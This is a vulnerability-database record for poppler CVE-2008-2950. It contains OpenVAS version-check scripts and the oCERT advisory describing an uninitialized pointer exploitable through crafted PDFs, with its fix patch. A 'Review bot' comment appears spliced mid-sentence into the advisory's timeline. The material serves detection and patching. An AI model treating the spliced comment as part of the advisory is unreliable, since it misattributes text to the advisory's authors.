script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2008 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"app-text/poppler\", unaffected: make_list(\"ge 0.6.3-r1\"), vulnerable: make_list(\"lt 0.6.3-r1\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-25T10:56:27", "bulletinFamily": "scanner", "description": "Check for the Version of poppler", "modified": "2017-07-10T00:00:00", "published": "2009-02-17T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=860449", "id": "OPENVAS:860449", "title": "Fedora Update for poppler FEDORA-2008-7104", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for poppler FEDORA-2008-7104\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or 
FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"poppler on Fedora 8\";\ntag_insight = \"Poppler, a PDF rendering library, it's a fork of the xpdf PDF\n viewer developed by Derek Noonburg of Glyph and Cog, LLC.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/fedora-package-announce/2008-August/msg00161.html\");\n script_id(860449);\n script_version(\"$Revision: 6623 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:10:20 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-17 17:03:12 +0100 (Tue, 17 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"FEDORA\", value: \"2008-7104\");\n script_cve_id(\"CVE-2008-2950\");\n script_name( \"Fedora Update for poppler FEDORA-2008-7104\");\n\n script_summary(\"Check for the Version of poppler\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n 
exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC8\")\n{\n\n if ((res = isrpmvuln(pkg:\"poppler\", rpm:\"poppler~0.6.2~2.fc8\", rls:\"FC8\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-25T10:56:15", "bulletinFamily": "scanner", "description": "Check for the Version of poppler", "modified": "2017-07-10T00:00:00", "published": "2009-02-17T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=860956", "id": "OPENVAS:860956", "title": "Fedora Update for poppler FEDORA-2008-7012", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for poppler FEDORA-2008-7012\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"poppler on Fedora 9\";\ntag_insight = \"Poppler, a PDF rendering library, is a fork of the xpdf PDF\n viewer developed by Derek Noonburg of Glyph and Cog, LLC.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/fedora-package-announce/2008-September/msg00697.html\");\n script_id(860956);\n script_version(\"$Revision: 6623 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:10:20 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-17 17:03:12 +0100 (Tue, 17 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"FEDORA\", value: \"2008-7012\");\n script_cve_id(\"CVE-2008-2950\");\n script_name( \"Fedora Update for poppler FEDORA-2008-7012\");\n\n script_summary(\"Check for the Version of poppler\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n 
exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC9\")\n{\n\n if ((res = isrpmvuln(pkg:\"poppler\", rpm:\"poppler~0.8.1~2.fc9\", rls:\"FC9\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-12-04T11:29:01", "bulletinFamily": "scanner", "description": "Ubuntu Update for Linux kernel vulnerabilities USN-631-1", "modified": "2017-12-01T00:00:00", "published": "2009-03-23T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=840277", "id": "OPENVAS:840277", "title": "Ubuntu Update for poppler vulnerability USN-631-1", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_631_1.nasl 7969 2017-12-01 09:23:16Z santu $\n#\n# Ubuntu Update for poppler vulnerability USN-631-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Felipe Andres Manzano discovered that poppler did not correctly initialize\n certain page widgets. If a user were tricked into viewing a malicious\n PDF file, a remote attacker could exploit this to crash applications\n linked against poppler, leading to a denial of service.\";\n\ntag_summary = \"Ubuntu Update for Linux kernel vulnerabilities USN-631-1\";\ntag_affected = \"poppler vulnerability on Ubuntu 7.10 ,\n Ubuntu 8.04 LTS\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-631-1/\");\n script_id(840277);\n script_version(\"$Revision: 7969 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-01 10:23:16 +0100 (Fri, 01 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-03-23 10:59:50 +0100 (Mon, 23 Mar 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"USN\", value: \"631-1\");\n script_cve_id(\"CVE-2008-2950\");\n script_name( \"Ubuntu Update for poppler vulnerability USN-631-1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : 
tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU8.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libpoppler-dev\", ver:\"0.6.4-1ubuntu3.1\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpoppler-glib-dev\", ver:\"0.6.4-1ubuntu3.1\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpoppler-glib2\", ver:\"0.6.4-1ubuntu3.1\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpoppler-qt-dev\", ver:\"0.6.4-1ubuntu3.1\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpoppler-qt2\", ver:\"0.6.4-1ubuntu3.1\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpoppler-qt4-2\", ver:\"0.6.4-1ubuntu3.1\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpoppler-qt4-dev\", ver:\"0.6.4-1ubuntu3.1\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpoppler2\", ver:\"0.6.4-1ubuntu3.1\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"poppler-utils\", ver:\"0.6.4-1ubuntu3.1\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU7.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libpoppler-dev\", ver:\"0.6-0ubuntu2.3\", 
rls:\"UBUNTU7.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpoppler-glib-dev\", ver:\"0.6-0ubuntu2.3\", rls:\"UBUNTU7.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpoppler-glib2\", ver:\"0.6-0ubuntu2.3\", rls:\"UBUNTU7.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpoppler-qt-dev\", ver:\"0.6-0ubuntu2.3\", rls:\"UBUNTU7.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpoppler-qt2\", ver:\"0.6-0ubuntu2.3\", rls:\"UBUNTU7.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpoppler-qt4-2\", ver:\"0.6-0ubuntu2.3\", rls:\"UBUNTU7.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpoppler-qt4-dev\", ver:\"0.6-0ubuntu2.3\", rls:\"UBUNTU7.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpoppler2\", ver:\"0.6-0ubuntu2.3\", rls:\"UBUNTU7.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"poppler-utils\", ver:\"0.6-0ubuntu2.3\", rls:\"UBUNTU7.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-07-25T10:56:54", "bulletinFamily": "scanner", "description": "The remote host is missing an update to poppler\nannounced via advisory FEDORA-2009-6982.", "modified": "2017-07-10T00:00:00", "published": "2009-06-30T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=64302", "id": "OPENVAS:64302", "title": "Fedora Core 9 FEDORA-2009-6982 (poppler)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_6982.nasl 6624 2017-07-10 06:11:55Z cfischer $\n# Description: 
Auto-generated from advisory FEDORA-2009-6982 (poppler)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Update Information:\n\nAn update to address jbig2-related security issues.\n\nChangeLog:\n\n* Fri Jan 23 2009 Rex Dieter - 0.8.7-2\n- use backported jbig2_security patch from debian/ubuntu (#496943)\n- poppler-data-0.2.1\n- --enable-libjpeg (speed)\n- track sonames\n- patch to workaround okular rendering hyperlinks (#480357)\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. 
Use \nsu -c 'yum update poppler' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-6982\";\ntag_summary = \"The remote host is missing an update to poppler\nannounced via advisory FEDORA-2009-6982.\";\n\n\n\nif(description)\n{\n script_id(64302);\n script_version(\"$Revision: 6624 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:11:55 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-06-30 00:29:55 +0200 (Tue, 30 Jun 2009)\");\n script_cve_id(\"CVE-2008-2950\", \"CVE-2009-0146\", \"CVE-2009-0147\", \"CVE-2009-0166\", \"CVE-2009-0799\", \"CVE-2009-0800\", \"CVE-2009-1179\", \"CVE-2009-1180\", \"CVE-2009-1181\", \"CVE-2009-1182\", \"CVE-2009-1183\", \"CVE-2009-1187\", \"CVE-2009-1188\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Core 9 FEDORA-2009-6982 (poppler)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=496943\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"poppler\", rpm:\"poppler~0.8.7~2.fc9\", rls:\"FC9\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"poppler-devel\", rpm:\"poppler-devel~0.8.7~2.fc9\", rls:\"FC9\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"poppler-glib\", rpm:\"poppler-glib~0.8.7~2.fc9\", rls:\"FC9\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"poppler-glib-devel\", rpm:\"poppler-glib-devel~0.8.7~2.fc9\", rls:\"FC9\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"poppler-qt\", rpm:\"poppler-qt~0.8.7~2.fc9\", rls:\"FC9\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"poppler-qt-devel\", rpm:\"poppler-qt-devel~0.8.7~2.fc9\", rls:\"FC9\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"poppler-qt4\", rpm:\"poppler-qt4~0.8.7~2.fc9\", rls:\"FC9\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"poppler-qt4-devel\", rpm:\"poppler-qt4-devel~0.8.7~2.fc9\", rls:\"FC9\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"poppler-utils\", rpm:\"poppler-utils~0.8.7~2.fc9\", rls:\"FC9\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"poppler-debuginfo\", rpm:\"poppler-debuginfo~0.8.7~2.fc9\", rls:\"FC9\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n 
security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-04-06T11:39:45", "bulletinFamily": "scanner", "description": "The remote host is missing an update to poppler\nannounced via advisory FEDORA-2009-6982.", "modified": "2018-04-06T00:00:00", "published": "2009-06-30T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231064302", "id": "OPENVAS:136141256231064302", "title": "Fedora Core 9 FEDORA-2009-6982 (poppler)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_6982.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-6982 (poppler)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Update Information:\n\nAn update to address jbig2-related security issues.\n\nChangeLog:\n\n* Fri Jan 23 2009 Rex Dieter - 0.8.7-2\n- use backported jbig2_security patch from debian/ubuntu (#496943)\n- poppler-data-0.2.1\n- --enable-libjpeg (speed)\n- track sonames\n- patch to workaround okular rendering hyperlinks (#480357)\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. Use \nsu -c 'yum update poppler' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-6982\";\ntag_summary = \"The remote host is missing an update to poppler\nannounced via advisory FEDORA-2009-6982.\";\n\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.64302\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-06-30 00:29:55 +0200 (Tue, 30 Jun 2009)\");\n script_cve_id(\"CVE-2008-2950\", \"CVE-2009-0146\", \"CVE-2009-0147\", \"CVE-2009-0166\", \"CVE-2009-0799\", \"CVE-2009-0800\", \"CVE-2009-1179\", \"CVE-2009-1180\", \"CVE-2009-1181\", \"CVE-2009-1182\", \"CVE-2009-1183\", \"CVE-2009-1187\", \"CVE-2009-1188\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Core 9 FEDORA-2009-6982 (poppler)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=496943\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"poppler\", rpm:\"poppler~0.8.7~2.fc9\", rls:\"FC9\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"poppler-devel\", rpm:\"poppler-devel~0.8.7~2.fc9\", rls:\"FC9\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"poppler-glib\", rpm:\"poppler-glib~0.8.7~2.fc9\", rls:\"FC9\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"poppler-glib-devel\", rpm:\"poppler-glib-devel~0.8.7~2.fc9\", rls:\"FC9\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"poppler-qt\", rpm:\"poppler-qt~0.8.7~2.fc9\", rls:\"FC9\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"poppler-qt-devel\", rpm:\"poppler-qt-devel~0.8.7~2.fc9\", rls:\"FC9\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"poppler-qt4\", rpm:\"poppler-qt4~0.8.7~2.fc9\", rls:\"FC9\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"poppler-qt4-devel\", rpm:\"poppler-qt4-devel~0.8.7~2.fc9\", rls:\"FC9\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"poppler-utils\", rpm:\"poppler-utils~0.8.7~2.fc9\", rls:\"FC9\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"poppler-debuginfo\", rpm:\"poppler-debuginfo~0.8.7~2.fc9\", rls:\"FC9\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n 
security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:26", "bulletinFamily": "software", "description": "\r\n2008/07/07 #2008-007 libpoppler uninitialized pointer\r\n\r\nDescription:\r\n\r\nThe poppler PDF rendering library suffers a memory management bug which leads\r\nto arbitrary code execution.\r\n\r\nThe vulnerability is present in the Page class constructor/destructor. The\r\npageWidgets object is not initialized in the Page constructor if specific\r\nconditions are met, but it is deleted afterwards in the destructor regardless\r\nof its initialization.\r\n\r\nSpecific PDF files can be crafted which allocate arbitrary memory to trigger\r\nthe vulnerability.\r\n\r\nA new poppler version addressing the issue is scheduled to be released on\r\nJuly 30th according to maintainer.\r\n\r\nThe following patch fixes the issue:\r\n\r\n\r\ndiff --git a/poppler/Page.cc b/poppler/Page.cc\r\nindex b28a3ee..72a706b 100644\r\n--- a/poppler/Page.cc\r\n+++ b/poppler/Page.cc\r\n@@ -230,7 +230,7 @@ GBool PageAttrs::readBox(Dict *dict, char *key, PDFRectangle *box) {\r\n \r\n Page::Page(XRef *xrefA, int numA, Dict *pageDict, PageAttrs *attrsA, Form *form) {\r\n Object tmp;\r\n- \r\n+ pageWidgets = NULL; //Security fix\r\n ok = gTrue;\r\n xref = xrefA;\r\n num = numA;\r\n\r\n\r\nAffected version:\r\n\r\npoppler <= 0.8.4\r\n\r\nFixed version:\r\n\r\npoppler, N/A\r\n\r\nCredit: vulnerability report, patch and PoC code received from Felipe Andres\r\nManzano <fmanzano [at] fceia [dot] unr [dot] edu [dot] ar>.\r\n\r\nCVE: CVE-2008-2950\r\n\r\nTimeline:\r\n2008-06-27: vulnerability report received\r\n2008-06-28: contacted poppler maintainers and affected vendors\r\n2008-06-30: maintainer confirms issue and patch\r\n2008-07-07: advisory 
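Review bot: the added `pageWidgets = NULL; //Security fix` at the top of `Page::Page` is the right minimal change, since it turns the destructor's unconditional `delete pageWidgets;` into a well-defined no-op on the `err1`/`err2` early-exit paths, but it would be safer in the constructor's member initializer list, where no future `goto` inserted above it can bypass it, and the comment should name the issue (CVE-2008-2950) so the seemingly redundant assignment is not removed as dead code later. The destructor also runs `delete attrs;`, so it is worth confirming in the same review that `attrs` is assigned before the first early exit, as this hunk covers `pageWidgets` only.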
release\r\n\r\nReferences:\r\n\r\nLinks:\r\nhttp://poppler.freedesktop.org\r\n\r\nPermalink:\r\nhttp://www.ocert.org/advisories/ocert-2008-007.html\r\n\r\n-- \r\nAndrea Barisani | Founder & Project Coordinator\r\n oCERT | Open Source Computer Emergency Response Team\r\n\r\n<lcars@ocert.org> http://www.ocert.org\r\n 0x864C9B9E 0A76 074A 02CD E989 CE7F AC3F DA47 578E 864C 9B9E\r\n "Pluralitas non est ponenda sine necessitate"", "modified": "2008-07-09T00:00:00", "published": "2008-07-09T00:00:00", "id": "SECURITYVULNS:DOC:20134", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:20134", "title": "[oCERT-2008-007] libpoppler uninitialized pointer", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:09:30", "bulletinFamily": "software", "description": "Uninitialized pointer dereference on PDF parsing.", "modified": 